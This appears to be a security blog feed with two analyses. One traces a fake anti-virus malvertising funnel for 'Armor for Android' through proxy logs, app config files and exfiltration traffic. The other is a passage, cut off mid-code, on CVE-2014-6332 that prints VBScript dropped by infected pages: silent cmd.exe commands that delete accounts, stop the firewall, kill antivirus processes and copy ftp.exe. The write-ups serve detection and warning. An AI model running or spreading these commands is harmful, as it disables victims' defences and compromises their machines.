<a href="http://2.bp.blogspot.com/-lS9tMO4kX88/VUbXQQUZegI/AAAAAAAAB1w/v-26gVeUgBU/s1600/armor.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="248" src="http://2.bp.blogspot.com/-lS9tMO4kX88/VUbXQQUZegI/AAAAAAAAB1w/v-26gVeUgBU/s1600/armor.png" width="320" /></a></div>
<b>Malvertisements and Fake AVs Outline: </b>Android has a very large user base and allows applications to be installed from sources other than the official store, which makes it an attractive target for attackers. Malicious applications are pushed through malicious advertisements. One widely used technique is to raise fake anti-virus alerts in the form of advertisements and then offer a "solution": an anti-virus application that is in fact a malicious application designed to steal information, demand a ransom, or demand payment to activate the license of the fake anti-virus. One way or another, money or information is extracted from end users by selling them a "risk or threat" through malicious advertisements. All of it is fake, but users who do not know better fall for the trap and end up handing over money or information.<br />
<br />
<b>Interestingly, legitimate businesses also use these scare tactics to push users into installing their applications through dubious means</b>. Read this for the reality of "Armor for Android": <b><a href="http://www.androidauthority.com/armor-for-android-342192/" target="_blank">http://www.androidauthority.com/armor-for-android-342192/</a>.</b> Several outlets describe the "Armor for Android" application as rogue. Interestingly, "Armor for Android" built its business on detection data provided by VirusTotal.com, as highlighted in this Naked Security blog post: <b><a href="https://nakedsecurity.sophos.com/2013/01/10/a-chink-in-android-armour/" target="_blank">https://nakedsecurity.sophos.com/2013/01/10/a-chink-in-android-armour/</a>. The application is now itself flagged as malicious on VirusTotal</b>: <b><a href="https://www.virustotal.com/en/file/af518ec81e4ddb7b08048b7924c7f63e55c654a702f5c62ebf3e83d39c51bab2/analysis/1430705447/" target="_blank">https://www.virustotal.com/en/file/af518ec81e4ddb7b08048b7924c7f63e55c654a702f5c62ebf3e83d39c51bab2/analysis/1430705447/</a></b><br />
<br />
We have been watching this trend for a couple of months and decided to do a brief analysis of the complete process. We still treat this application as fake or rogue based on the methods used to get it installed on end users' phones.<br />
<br />
Let's take a look at the recent malicious advertisement campaign pushing "Armor for Android", a so-called authentic application advertised as providing effective anti-virus services. <b>Amazingly, "Armor for Android" is still on the market despite such business practices, and the latest campaign is discussed in this post.</b> The questions that need critical thinking are:<br />
<ol>
<li><b><i>Is there any value in ethical business models in online advertisements?</i></b></li>
<li><b><i>How can we obtain users' trust if rogue business tactics are used?</i></b></li>
</ol>
Let's walk through the installation process of the "Armor for Android" application (that is, the malvertisement flow) step by step:<br />
<br />
<b>Step 1:</b> The landing website generates an error notification, shown below, claiming that the user's Galaxy Nexus phone is infected. No scan detects the device: the model, brand, country and ISP are passed as parameters in the landing URL's query string (visible in the HTTP flow at the end of the post) and echoed back into the page.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-oWahAM9kU0A/VPP8l5l9o4I/AAAAAAAAB0E/pMyIl8WZ1SA/s1600/5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="361" src="http://4.bp.blogspot.com/-oWahAM9kU0A/VPP8l5l9o4I/AAAAAAAAB0E/pMyIl8WZ1SA/s1600/5.png" width="640" /></a></div>
<br />
<br />
<b>Step 2:</b> After the notification is accepted, the page claims that the underlying device is infected with "Hornyworm.apk".<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-bqKkuL1M5JA/VPP8vfZbn8I/AAAAAAAAB0M/g8k1Lrt1NeE/s1600/android_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="372" src="http://3.bp.blogspot.com/-bqKkuL1M5JA/VPP8vfZbn8I/AAAAAAAAB0M/g8k1Lrt1NeE/s1600/android_1.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<b>Step 3: </b>After a few seconds, a fake message appears showing the user's Android phone in a "scanning" phase and offers a solution: download an anti-virus application.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-42PopPiBISg/VPP82ZW5dhI/AAAAAAAAB0U/wcB3euLeO_g/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="362" src="http://4.bp.blogspot.com/-42PopPiBISg/VPP82ZW5dhI/AAAAAAAAB0U/wcB3euLeO_g/s1600/2.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<b>Step 4:</b> After a few more seconds, the Android application is served:</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-d0aKdhJZC9E/VPP9AuCVubI/AAAAAAAAB0c/7Pt1iTxKezI/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="362" src="http://4.bp.blogspot.com/-d0aKdhJZC9E/VPP9AuCVubI/AAAAAAAAB0c/7Pt1iTxKezI/s1600/3.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<b>Step 5: </b>The website also shows exactly how the application needs to be installed.</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-OOZrEOOs7e0/VPP9RsHC27I/AAAAAAAAB0k/2ZjofSioFl0/s1600/4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="364" src="http://4.bp.blogspot.com/-OOZrEOOs7e0/VPP9RsHC27I/AAAAAAAAB0k/2ZjofSioFl0/s1600/4.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
The complete HTTP network flow is presented below to show the various websites through which the end-user's Android phone is redirected.</div>
<br />
<pre style="background-image: URL(http://2.bp.blogspot.com/_z5ltvMQPaa8/SjJXr_U2YBI/AAAAAAAAAAM/46OqEP32CJ8/s320/codebg.gif); background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;"> 02:02:34.141 2.050 734 1383 GET 200 text/html http://www.cellphoneupdated.com/fatalvirus/us/106/index.php?countryname=United%20States&model=Galaxy%20Nexus&brand=Samsung&isp=Nobis%20Technology%20Group%2C%20LLC&voluumdata=vid..00000003-87e9-496c-8000-000000000000__vpid..5226a000-bf41-11e4-8376-93ef5ad96b35__caid..a88aabcb-264f-46ba-9801-a85f36f00867__lid..1b71b07a-7436-46e5-981f-f6273dfbcbb5__rt..DJ__oid1..4e28fd07-1e86-4ea9-9d0e-bdcfc0d9ffd1__var1..U
02:02:36.216 0.056 749 (1965) GET (Cache) application/x-javascript http://www.cellphoneupdated.com/fatalvirus/us/106/backfix.min.js
02:03:39.010 0.020 805 (82) GET (Cache) text/html http://www.cellphoneupdated.com/fatalvirus/us/106/blank.html
02:03:39.772 0.060 897 (214) GET 304 text/html http://www.cellphoneupdated.com/fatalvirus/us/106/blank.html?HistoryLoad
02:03:43.045 2.351 947 222 GET 200 text/html http://track.cellphoneupdated.com/click
02:03:45.492 2.083 657 625 GET 200 text/html http://1nxoz.redirectvoluum.com/redirect?target=http%3A%2F%2Fhop.armorforandroid.net%2Fgo%2Faa.aff%3Faffid%3D10027%26v_campaign%3Dyd447a9ysnrwv44b2m8p97au545hqbpnqrqv%26subid%3DdQ31FAIBI19DCGGI0DIHGN46&ts=1425257252676&hash=zuiF0czwgopTMlbFFybUElFtRrEzh08G4HY3fKQ%2FH%2FQ%3D&rm=DJ
02:03:47.618 2.253 749 846 GET 302 Redirect to: http://www.fastermobile.org/v3e/index.html?pop=1&version=release-search&strat=2&page=aa.matt.5svp.0830&split=c9c82b85.control&ccrule=fcc98f53&offer=aa.gi.default&product=anti-virus&partner=afacom&country=xx&language=en&pool=9d05eb72&affid=10027&v_campaign=yd447a9ysnrwv44b2m8p97au545hqbpnqrqv&subid=dQ31FAIBI19DCGGI0DIHGN46&shortcut=aa.aff&ipcc=us&iprc=ca&xsid=rfAdNVge1k6VR8ctHV7h2A&ccconfigid=a29869e5.140812 http://hop.armorforandroid.net/go/aa.aff?affid=10027&v_campaign=yd447a9ysnrwv44b2m8p97au545hqbpnqrqv&subid=dQ31FAIBI19DCGGI0DIHGN46
02:03:49.959 0.148 1028 215 GET 303 Redirect to: /k/7s5jJPFpAdahNMbjZEbNCMUqOd4WD_sQ3Y9g7f0zBqYfUf7BRJw1jg2/fdu8903/index.html?pop=1&version=release-search&strat=2&page=aa.matt.5svp.0830&split=c9c82b85.control&ccrule=fcc98f53&offer=aa.gi.default&product=anti-virus&partner=afacom&country=xx&language=en&pool=9d05eb72&affid=10027&v_campaign=yd447a9ysnrwv44b2m8p97au545hqbpnqrqv&subid=dQ31FAIBI19DCGGI0DIHGN46&shortcut=aa.aff&ipcc=us&iprc=ca&xsid=rfAdNVge1k6VR8ctHV7h2A&ccconfigid=a29869e5.140812 http://www.fastermobile.org/v3e/index.html?pop=1&version=release-search&strat=2&page=aa.matt.5svp.0830&split=c9c82b85.control&ccrule=fcc98f53&offer=aa.gi.default&product=anti-virus&partner=afacom&country=xx&language=en&pool=9d05eb72&affid=10027&v_campaign=yd447a9ysnrwv44b2m8p97au545hqbpnqrqv&subid=dQ31FAIBI19DCGGI0DIHGN46&shortcut=aa.aff&ipcc=us&iprc=ca&xsid=rfAdNVge1k6VR8ctHV7h2A&ccconfigid=a29869e5.140812
02:03:50.154 0.113 1090 3072 GET 200 text/html http://www.fastermobile.org/k/7s5jJPFpAdahNMbjZEbNCMUqOd4WD_sQ3Y9g7f0zBqYfUf7BRJw1jg2/fdu8903/index.html?pop=1&version=release-search&strat=2&page=aa.matt.5svp.0830&split=c9c82b85.control&ccrule=fcc98f53&offer=aa.gi.default&product=anti-virus&partner=afacom&country=xx&language=en&pool=9d05eb72&affid=10027&v_campaign=yd447a9ysnrwv44b2m8p97au545hqbpnqrqv&subid=dQ31FAIBI19DCGGI0DIHGN46&shortcut=aa.aff&ipcc=us&iprc=ca&xsid=rfAdNVge1k6VR8ctHV7h2A&ccconfigid=a29869e5.140812
02:03:50.293 0.145 864 1025 GET 200 text/css http://www.fastermobile.org/k/7s5jJPFpAdahNMbjZEbNCMUqOd4WD_sQ3Y9g7f0zBqYfUf7BRJw1jg2/fdu8903/a.css
02:03:50.312 0.046 877 (0) GET (Cache) application/javascript http://cdnjs.cloudflare.com/ajax/libs/zepto/1.1.4/zepto.min.js
02:03:50.330 0.232 879 891 GET 200 image/png http://www.fastermobile.org/k/7s5jJPFpAdahNMbjZEbNCMUqOd4WD_sQ3Y9g7f0zBqYfUf7BRJw1jg2/fdu8903/z.png
02:03:50.473 0.144 837 455 GET 200 application/x-javascript http://antivirus.trafficmanager.net/threatCount?range=7&callback=jsonp1&_=1425257258028
02:03:50.498 0.252 799 226 GET 200 application/javascript http://api.handsetdetection.com/sites/js/32266.js
02:03:50.525 0.285 877 167 GET 204 text/plain http://pixel.sitescout.com/iap/14b1248479c050b7
02:03:50.563 0.165 506 824 GET 200 image/png http://www.fastermobile.org/k/7s5jJPFpAdahNMbjZEbNCMUqOd4WD_sQ3Y9g7f0zBqYfUf7BRJw1jg2/fdu8903/p.png
02:03:50.583 0.370 539 35219 GET 200 application/x-font-ttf http://www.fastermobile.org/k/7s5jJPFpAdahNMbjZEbNCMUqOd4WD_sQ3Y9g7f0zBqYfUf7BRJw1jg2/fdu8903/font.ttf
02:03:54.517 0.178 1278 2382 GET 200 text/html http://www.fastermobile.org/k/7s5jJPFpAdahNMbjZEbNCMUqOd4WD_sQ3Y9g7f0zBqYfUf7BRJw1jg2/fdu8903/i.html?pop=1&version=release-search&strat=2&page=aa.matt.5svp.0830&split=c9c82b85.control&ccrule=fcc98f53&offer=aa.gi.default&product=anti-virus&partner=afacom&country=xx&language=en&pool=9d05eb72&affid=10027&v_campaign=yd447a9ysnrwv44b2m8p97au545hqbpnqrqv&subid=dQ31FAIBI19DCGGI0DIHGN46&shortcut=aa.aff&ipcc=us&iprc=ca&xsid=rfAdNVge1k6VR8ctHV7h2A&ccconfigid=a29869e5.140812
02:03:54.738 0.151 861 1085 GET 200 text/css http://www.fastermobile.org/k/7s5jJPFpAdahNMbjZEbNCMUqOd4WD_sQ3Y9g7f0zBqYfUf7BRJw1jg2/fdu8903/aa.css
02:03:54.757 0.031 873 (0) GET (Cache) application/javascript http://cdnjs.cloudflare.com/ajax/libs/zepto/1.1.4/zepto.min.js
02:03:54.924 0.056 787 (1560) GET (Cache) application/x-javascript http://connect.facebook.net/en_US/fbds.js
02:03:54.950 0.240 873 167 GET 204 text/plain http://pixel.sitescout.com/iap/0770a2fc94ca2cbc
02:03:55.018 2.176 2106 334 POST 200 image/gif https://www.facebook.com/tr/
02:03:57.279 2.584 1205 3.2M GET 200 application/vnd.android.package-archive http://dlhub1.com/download/full?pop=1&version=release-search&strat=2&page=aa.matt.5svp.0830&split=c9c82b85.control&ccrule=fcc98f53&offer=aa.gi.default&product=anti-virus&partner=afacom&country=xx&language=en&pool=9d05eb72&affid=10027&v_campaign=yd447a9ysnrwv44b2m8p97au545hqbpnqrqv&subid=dQ31FAIBI19DCGGI0DIHGN46&shortcut=aa.aff&ipcc=us&iprc=ca&xsid=rfAdNVge1k6VR8ctHV7h2A&ccconfigid=a29869e5.140812
02:04:05.722 0.165 507 14521 GET 200 image/png http://www.fastermobile.org/k/7s5jJPFpAdahNMbjZEbNCMUqOd4WD_sQ3Y9g7f0zBqYfUf7BRJw1jg2/fdu8903/x.png </code></pre>
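The hop chain in a flow like the one above can be reconstructed automatically rather than read by eye. The Python script below is an added example written for this post (it is not part of the original analysis): it parses lines in the same column layout as the proxy log above, lists the hosts the phone is bounced through in first-seen order, records every HTTP redirect, flags any response whose content-type is an Android package, and collects the affiliate parameters (affid, subid, and so on) that travel through the query strings and tie the install to a payout. The embedded sample lines are constructed from the hosts and parameters shown in this post, with the long query strings trimmed.<br />
<br />
```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample in the proxy-log column layout used above:
#   time duration bytes-sent bytes-received METHOD status content-type URL
# A 3xx line instead reads "... status Redirect to: <target> <requested-url>".
# Hosts are those named in the post; the query strings are trimmed.
SAMPLE_FLOW = """\
02:02:34.141 2.050 734 1383 GET 200 text/html http://www.cellphoneupdated.com/fatalvirus/us/106/index.php?countryname=United%20States&model=Galaxy%20Nexus
02:02:36.216 0.056 749 (1965) GET (Cache) application/x-javascript http://www.cellphoneupdated.com/fatalvirus/us/106/backfix.min.js
02:03:43.045 2.351 947 222 GET 200 text/html http://track.cellphoneupdated.com/click
02:03:45.492 2.083 657 625 GET 200 text/html http://1nxoz.redirectvoluum.com/redirect?target=http%3A%2F%2Fhop.armorforandroid.net%2Fgo%2Faa.aff
02:03:47.618 2.253 749 846 GET 302 Redirect to: http://www.fastermobile.org/v3e/index.html?affid=10027&subid=dQ31FAIBI19DCGGI0DIHGN46 http://hop.armorforandroid.net/go/aa.aff?affid=10027
02:03:50.154 0.113 1090 3072 GET 200 text/html http://www.fastermobile.org/k/fdu8903/index.html?affid=10027
02:03:57.279 2.584 1205 3.2M GET 200 application/vnd.android.package-archive http://dlhub1.com/download/full?product=anti-virus&affid=10027&subid=dQ31FAIBI19DCGGI0DIHGN46
"""

APK_MIME = "application/vnd.android.package-archive"
AFFILIATE_KEYS = ("affid", "subid", "v_campaign", "voluumdata")

LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<dur>\S+)\s+(?P<sent>\S+)\s+(?P<recv>\S+)\s+"
    r"(?P<method>[A-Z]+)\s+(?P<status>\S+)\s+(?P<rest>.+)$"
)


def parse_flow(text):
    """Turn the log text into a list of request dicts, in file order."""
    events = []
    for raw in text.splitlines():
        m = LINE_RE.match(raw.strip())
        if not m:
            continue  # blank or unparseable line
        rest, redirect_to, ctype = m.group("rest"), None, None
        if rest.startswith("Redirect to:"):
            # "Redirect to: <target> <requested-url>": no content-type column
            _, _, redirect_to, url = rest.split(None, 3)
        else:
            ctype, url = rest.split(None, 1)
        events.append({
            "ts": m.group("ts"),
            "status": m.group("status"),
            "content_type": ctype,
            "url": url.strip(),
            "host": urlsplit(url).hostname,
            "redirect_to": redirect_to,
            # relative Location values (like the 303 above) have no host
            "redirect_host": urlsplit(redirect_to).hostname if redirect_to else None,
        })
    return events


def summarize(events):
    """Hosts in first-seen order, redirect pairs, APK downloads and affiliate ids."""
    hosts, seen = [], set()
    redirects, payloads, tracking = [], [], {}
    for ev in events:
        for host in (ev["host"], ev["redirect_host"]):
            if host and host not in seen:
                seen.add(host)
                hosts.append(host)
        if ev["redirect_host"]:
            redirects.append((ev["host"], ev["redirect_host"]))
        if ev["content_type"] == APK_MIME:
            payloads.append(ev["url"])
        # affiliate/campaign parameters are what get the operator paid per install
        for key, values in parse_qs(urlsplit(ev["url"]).query).items():
            if key in AFFILIATE_KEYS:
                tracking.setdefault(key, set()).update(values)
    return {"hosts": hosts, "redirects": redirects, "payloads": payloads, "tracking": tracking}


if __name__ == "__main__":
    report = summarize(parse_flow(SAMPLE_FLOW))
    print("hop chain :", " -> ".join(report["hosts"]))
    print("redirects :", report["redirects"])
    print("APK served:", report["payloads"])
    print("tracking  :", report["tracking"])
```

Run on the sample, the chain reads cellphoneupdated.com, the tracker, the Voluum redirector, the affiliate hop, fastermobile.org and finally dlhub1.com, which is the only host that returns an APK; the same affid value survives every hop, which is the quickest way to tell an affiliate-driven fake-AV funnel from a one-off compromised site.<br />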
<br />
The application looks as shown below. It asks for the user's credit or debit card information in order to carry out a transaction, so that the fake anti-virus application can be "installed" once a license has been bought. The whole process is fake.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-wp_qp7qhefU/VPP9pUkoVJI/AAAAAAAAB0s/Xv4b6UEfQqI/s1600/and_st.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="http://4.bp.blogspot.com/-wp_qp7qhefU/VPP9pUkoVJI/AAAAAAAAB0s/Xv4b6UEfQqI/s1600/and_st.png" width="192" /></a></div>
<br />
<b>Assets Information:</b><br />
<br />
parameters.json {<br />
"bugsense_key": "f75779a2",<br />
"analytics_key": "01c0994d555ea19e1ef7e0e5b69c9dab",<br />
"security_key": "ca9u",<br />
"quick_scan": "true",<br />
"device_threats": "false"<br />
}<br />
<br />
version.json {<br />
"configuration": "1983",<br />
"pop": "1",<br />
"version": "release-search",<br />
"strat": "2",<br />
"page": "aa.matt.5svp.0830",<br />
"split": "c9c82b85.control",<br />
"ccrule": "fcc98f53",<br />
"offer": "aa.gi.default",<br />
"product": "anti-virus",<br />
"partner": "afacom",<br />
"country": "xx",<br />
"language": "en",<br />
"pool": "9d05eb72",<br />
"affid": "10027",<br />
"v_campaign": "yd447a9ysnrwv44b2m8p97au545hqbpnqrqv",<br />
"subid": "dAF08D9FUE813PVJ0PNAMH6O",<br />
"shortcut": "aa.aff",<br />
"ipcc": "us",<br />
"iprc": "ca",<br />
"xsid": "FyY0MUJgP0-AitmpO62mVw",<br />
"ccconfigid": "a29869e5.140812"<br />
}<br />
<br />
<b>Read/Write Operations are shown below:</b><br />
<br />
<pre style="background-image: URL(http://2.bp.blogspot.com/_z5ltvMQPaa8/SjJXr_U2YBI/AAAAAAAAAAM/46OqEP32CJ8/s320/codebg.gif); background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;">write /data/data/com.armorforandroid.security/shared_prefs/APP_PREFS_LOCKED.xml|
read  /data/data/com.android.music/shared_prefs/Music.xml|
write /data/data/com.armorforandroid.security/shared_prefs/APP_PREFS_LOCKED.xml|
write /data/data/com.armorforandroid.security/shared_prefs/APP_PREFS_LOCKED.xml|
read  /data/data/com.android.browser/shared_prefs/com.android.browser_preferences.xml|
read  /data/data/com.android.mms/shared_prefs/_has_set_default_values.xml|
read  /data/data/com.android.mms/shared_prefs/com.android.mms_preferences.xml|
</code></pre>
<br />
<b>Device ID submitted as follows:</b><br />
<br />
POST /api/submit?deviceId=d3rqs2c37m&version=349 HTTP/1.1<br />
Content-Type: application/json; charset=utf-8<br />
User-Agent: Dalvik/1.4.0 (Linux; U; Android 2.3.4; generic Build/GRJ22)<br />
Host: url.armorforandroid.net<br />
Connection: Keep-Alive<br />
Content-Length: 641<br />
Accept-Encoding: gzip<br />
<br />
<b>Data Exfiltration:</b><br />
<br />
POST /innilytics/upload/01c0994d555ea19e1ef7e0e5b69c9dab HTTP/1.1<br />
Content-Type: application/x-gzip<br />
Content-Length: 1558<br />
Host: innilytics.cloudapp.net<br />
Connection: Keep-Alive<br />
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)<br />
<br />
<span style="color: red;"><i>...........WYo.7.~....,<br />..\.~..&h.6<br />.&@Q..Oy.=.=....{g.R".).......c...o.O|........a\.,......M,.....<br />A...."pbyH.q.t*`...).J.R.r.........3.;...i./...<br />}W.M....?.........&.".eP*D.Tp..%<51...$]`.J.4OV)Zp....pL....i:p..m.+....}."/Y..=o......Q@.:G.@.KW@.V.n<<br />!J..6<*o.g...;].2.\.ESA.....'^R....:..k.#;...4k.c.,ep1#..2Zf".IE..+.7.:..z..t.1..e...3.5.......1...v.k......|..<br />Z..Y.y..2.2&..eID...Pz.z...L.0...R.......x........./..q.=...AK......l$.)C<-D..K....Z..p.x.1.....R....B.x..\.~..v...a..<x.{.g....v.k.k..o.>u....!....k..a"..m..&..(1.C.l..;....w5...j< yot.....r....5..,..l.n...f2G.C.v.@..r........F..&.B...#...H..<br />SWU.6c...C.-.g.!.=.9..O...<y.X3...S....O..?.......V[,.u..[s=......h..(;I!....../.1<br />....5..y.5..&D7m...c?...m'.p.......v=..#......y.isZ.}........iNVl...@.< }.l.\....j./j..K.....Yq.9.\..m.X.o.K7l.T......o.n.}...[w.f<d6.Z.s]o.*....(O..w..L...v.d......Y..~.gH...Q...3.....5...Tq@...9<br />..x.!..[h.x_.."7.j.f..h...K)...............8...0y\.-..]<br />..>h.{....?X...P?.9..]....d........N)(..2.o......_.O/.n.SrZ.....h^]...^......V.....q..........c..e...?x>..l6.ztS..L^.?..Uk.....F. ...95...9..-b...L<br />.d..l.uc....V....|ys...;.@...1..l...*ZOx.4.X...u......mf..N..5..<br />..].#).Y..G}..........vy......>C>..B..... .4.8..1!.B..(.."...........1.;..+..`....=Q..._A....G.....>E[....#._...P.?.......q.g.f.C.J ...Wq..UP....H...........fy4.........(:......-^....d......AJW.D{...(..........x....x....+.....(...jI........J"....F$..O..~j.z.|......[..Gv.E9z..........P.P l"$3D..z.m.t..d.}....~...._G$..oV..@..[.Z.....9..E...r..x..y~..Un....,.%3`N.R..J..\".%.... 0S."(q.ER......v.....</i>.</span><br />
<br />
HTTP/1.1 200 OK<br />
Cache-Control: private<br />
Server: Microsoft-IIS/7.5<br />
X-AspNetMvc-Version: 3.0<br />
X-AspNet-Version: 4.0.30319<br />
X-Powered-By: ASP.NET<br />
Date: Mon, 04 May 2015 01:36:51 GMT<br />
Content-Length: 0<br />
<br />
Virus Total - <b><a href="https://www.virustotal.com/en/file/af518ec81e4ddb7b08048b7924c7f63e55c654a702f5c62ebf3e83d39c51bab2/analysis/1430705447/" target="_blank">https://www.virustotal.com/en/file/af518ec81e4ddb7b08048b7924c7f63e55c654a702f5c62ebf3e83d39c51bab2/analysis/1430705447/</a></b><br />
<br />
At the time of this post, the link is still active: <b><span style="color: red;">hxxp://www.cellphoneupdated.com/fatalvirus/us/106/index.php?countryname=United%20States&model=Galaxy%20Nexus&brand=Samsung&isp=Nobis%20Technology%20Group%2C%20LLC&voluumdata=vid..00000003-87e9-496c-8000-000000000000__vpid..5226a000-bf41-11e4-8376-93ef5ad96b35__caid..a88aabcb-264f-46ba-9801-a85f36f00867__lid..1b71b07a-7436-46e5-981f-f6273dfbcbb5__rt..DJ__oid1..4e28fd07-1e86-4ea9-9d0e-bdcfc0d9ffd1__var1..U</span></b><br />
<b><span style="color: red;"><br /></span></b>
<b><span style="color: red;">Beware of these kinds of applications!</span></b><br />
<b><br /></b>Aditya K Soodhttp://www.blogger.com/profile/10592122467317696329noreply@blogger.comtag:blogger.com,1999:blog-1900729850320917040.post-57051593101458772062015-03-14T22:06:00.001-07:002015-03-14T22:06:07.457-07:00A Real World Story of CVE-2014-6332 : RCE and Malware Download via VBScript !<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-Af4DiWLbLHE/VPP5HsuD6TI/AAAAAAAABz4/oOHODQNTniQ/s1600/security_exploits.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-Af4DiWLbLHE/VPP5HsuD6TI/AAAAAAAABz4/oOHODQNTniQ/s1600/security_exploits.jpg" height="133" width="200" /></a></div>
Recently, we have observed in our analysis that exploit code for the vulnerability CVE-2014-6332 is either embedded directly in the webpages of infected websites or used as part of <a href="http://secniche.org/presentations/virus_bulletin_barcelona_2011_adityaks.pdf" target="_blank">Browser Exploit Packs</a> (BEPs) to download malware and execute commands remotely.<br />
<br />
<span style="white-space: pre;">Earlier, we discussed how Chinese domains served almost the same exploits, taken from Metasploit (</span><a href="http://secniche.blogspot.com/2013/03/malware-retrospective-infected-chinese.html" style="white-space: pre;" target="_blank"><b>http://secniche.blogspot.com/2013/03/malware-retrospective-infected-chinese.html</b></a><span style="white-space: pre;">)</span><span style="white-space: pre;">, to trigger infections. However, attackers tweak the structure of the exploits as required in order to carry out successful infections on the fly through compromised websites.</span><br />
<br />
Let's discuss the vulnerability in question. From the Internet: <i>"CVE-2014-6332: OleAut32.dll in OLE in Microsoft Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allows remote attackers to execute arbitrary code via a crafted web site, as demonstrated by an array-redimensioning attempt that triggers improper handling of a size value in the SafeArrayDimen function, aka "Windows OLE Automation Array Remote Code Execution Vulnerability."</i><br />
<br />
Refer: Metasploit Module (<a href="http://downloads.securityfocus.com/vulnerabilities/exploits/70952.rb" target="_blank"><b>http://downloads.securityfocus.com/vulnerabilities/exploits/70952.rb</b></a>) and the Microsoft advisory on the subject (<a href="https://technet.microsoft.com/en-us/library/security/ms14-064.aspx" target="_blank"><b>https://technet.microsoft.com/en-us/library/security/ms14-064.aspx</b></a>).<br />
<br />
Trend Micro has already discussed this vulnerability (<a href="http://blog.trendmicro.com/trendlabs-security-intelligence/a-killer-combo-critical-vulnerability-and-godmode-exploitation-on-cve-2014-6332/" target="_blank"><b>http://blog.trendmicro.com/trendlabs-security-intelligence/a-killer-combo-critical-vulnerability-and-godmode-exploitation-on-cve-2014-6332</b>/</a>), so we do not want to discuss it in detail.<br />
<br />
Two variants of VBScript that are used in conjunction with this vulnerability have been found; they are discussed below. The primary structure of the exploit remains the same, but the payload is entirely determined by the VBScript code embedded in the webpages or BEPs.<br />
<br />
As you can see, "cmd.exe" is triggered with the options "/q /c", which make Windows execute the command without echoing its output, so the commands run without any notification in the Windows GUI (the trailing 0 passed to shell.run additionally hides the console window). Other insights:<br />
<br />
The Norton "360.exe" process is killed and several other commands are executed.<br />
<br />
<pre style="background-image: URL(http://2.bp.blogspot.com/_z5ltvMQPaa8/SjJXr_U2YBI/AAAAAAAAAAM/46OqEP32CJ8/s320/codebg.gif); background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;"> <script language="VBScript">
function runmumaa()
On Error Resume Next
set shell=createobject("wscript.shell")
shell.run "cmd.exe /q /c net user admin /del",0
shell.run "cmd.exe /q /c sc stop sharedaccess",0
shell.run "cmd.exe /q /c md C:\RECYCLER",0
shell.run "cmd.exe /q /c taskkill /f /im 360rp.exe",0
shell.run "cmd.exe /q /c taskkill /f /im 360sd.exe",0
shell.run "cmd.exe /q /c taskkill /f /im 360tray.exe",0
shell.run "cmd.exe /q /c taskkill /f /im arp2.exe",0
shell.run "cmd.exe /q /c taskkill /f /im 360.exe",0
shell.run "cmd.exe /q /c taskkill /f /im 361.exe",0
shell.run "cmd.exe /q /c ping 127.0.0.1 -n 200&taskkill /f /im fp.exe&taskkill /f /im ftp.exe&taskkill /f /im arp1.exe&taskkill /f /im arp2.exe&taskkill /f /im fa1.exe&taskkill /f /im fa2.exe&taskkill /f /im fa.exe",0
shell.run "cmd.exe /q /c del C:\docume~1\alluse~1\「开始」菜单\程序\启动\360.exe",0
shell.run "cmd.exe /q /c del C:\docume~1\alluse~1\「开始」菜单\程序\启动\361.exe",0
shell.run "cmd.exe /q /c del C:\RECYCLER\360.exe",0
shell.run "cmd.exe /q /c del C:\RECYCLER\361.exe",0
shell.run "cmd.exe /q /c copy c:\windows\system32\ftp.exe C:\RECYCLER\fp.exe",0
shell.run "cmd.exe /q /c copy c:\windows\system32\ftp.exe c:\windows\system32\fp.exe",0
shell.run "cmd.exe /q /c copy %systemroot%\system32\ftp.exe %systemroot%\system32\fp.exe",0
